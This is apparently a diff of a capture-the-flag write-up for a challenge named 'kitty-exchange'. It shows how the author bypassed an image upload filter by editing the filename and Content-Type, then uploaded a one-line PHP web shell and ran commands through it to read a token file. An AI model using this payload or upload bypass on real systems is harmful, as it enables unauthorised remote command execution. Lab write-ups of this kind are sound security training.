Data-Sec/ctf-writeups-2023/kitty-exchange.md

 - ...
 I get my secure kitty link <IP>/upload/0ffc7b...c9b6d.php
 - ... and opening it in the browser, gives me my hoped for shell.
 - Note: Using a reverse shell circumvents server side firewalling.
 However, it seems there is none.
 So, the same shit flies using a bind shell.
 - Let's look around a bit, shell we? (pun intended)
     - `whoami` ... so far so expected.
     - `ls -al /` ... wait... what???
 What do we have here?
 Can we read the token already?
 Yes, we can!
+    - `cat /DS-token`
+### 2.
+- I don't need a reverse shell!
+I'll just use my trusty browser and the developer tools.
+  - After uploading an example image I found out that I can just resend the packet with different Content!
+  - So this time I'm just gonna change "filename=example.png" to "filename=example.php", and "Content-Type: image/png" with "Content-Type: text/html"
+  - And replacing the Image data with `<?php echo shell_exec($_GET['cmd']); ?>`
+- Nice!
+When following the link of the Image we can now put a Querystring behind in the browser to execute commands!
+- For example `filename.php?cmd=ls`
+- Let's look around a bit, shell we? (pun intended)
+    - `whoami` ... so far so expected.
+    - `ls -al /` ... wait... what???
+What do we have here?
+Can we read the token already?
+Yes, we can!